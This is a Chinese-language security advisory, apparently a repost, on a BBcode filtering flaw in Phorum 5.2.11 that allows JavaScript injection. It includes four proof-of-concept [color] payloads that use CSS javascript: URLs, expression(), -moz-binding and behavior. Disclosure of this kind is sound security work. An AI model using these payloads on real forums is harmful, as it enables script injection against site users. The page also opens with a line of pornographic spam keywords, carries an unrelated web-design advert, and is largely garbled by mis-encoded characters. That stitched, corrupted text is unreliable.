日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

影響版本: Phorum 5.2.11

成都創(chuàng)新互聯(lián)專(zhuān)注于企業(yè)全網(wǎng)整合營(yíng)銷(xiāo)推廣、網(wǎng)站重做改版、大新網(wǎng)站定制設(shè)計(jì)、自適應(yīng)品牌網(wǎng)站建設(shè)、H5開(kāi)發(fā)、成都商城網(wǎng)站開(kāi)發(fā)、集團(tuán)公司官網(wǎng)建設(shè)、外貿(mào)營(yíng)銷(xiāo)網(wǎng)站建設(shè)、高端網(wǎng)站制作、響應(yīng)式網(wǎng)頁(yè)設(shè)計(jì)等建站業(yè)務(wù)，價(jià)格優(yōu)惠性?xún)r(jià)比高，為大新等各大城市提供網(wǎng)站開(kāi)發(fā)制作服務(wù)。

漏洞描述: BUGTRAQ: 35777  

Phorum是一款基于PHP的WEB論壇程序，可在Linux和Unix操作系統(tǒng)下使用，也可在Microsoft Windows操作系統(tǒng)下使用。  Phorum的過(guò)濾引擎沒(méi)有充分地驗(yàn)證某些BBcode參數(shù)，遠(yuǎn)程攻擊者可以在所提交的請(qǐng)求中使用導(dǎo)致注入并執(zhí)行惡意JavaScript代碼。<*參考   crashfr （crashfr@sysdream.com）http://milw0rm.com/exploits/9231  http://secunia.com/advisories/35928/ *>

測(cè)試方法: [www.sebug.net]

本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險(xiǎn)自負(fù)!

[color=#000000;background-image:url(javascript:alert(’Sysdream_IE6_Alert’));]Sysdream Testing IE6[/color]
[color=#000000;xss:expression(alert(’Sysdream_IE7_Alert’));]Sysdream Testing XSS[/color]
[color=#000000;-moz-binding:url( http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=9,filename=script.xml#mycode);]Sysdream Testing FF[/color]
[color=#000000;behavior:url( http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream">http://127.0.0.1/phorum/file.php?0,file=8,filename=script.htc);]Sysdream Testing FF[/color]SEBUG

安全建議: 廠(chǎng)商補(bǔ)?。?Phorum

目前廠(chǎng)商已經(jīng)發(fā)布了升級(jí)補(bǔ)丁以修復(fù)這個(gè)安全問(wèn)題。

請(qǐng)到廠(chǎng)商的主頁(yè)下載： http://www.phorum.org/phorum5/read.php?64,139411

【編輯推薦】

1. Macromedia ColdFusion日志條目HTML注入漏洞
2. 多家廠(chǎng)商的web漏洞掃描程序存在HTML注入漏洞
3. Rockliffe 郵件信息HTML注入漏洞

當(dāng)前題目：Phorum過(guò)濾引擎HTML代碼注入漏洞
文章位置：http://www.dlmjj.cn/article/cdoddie.html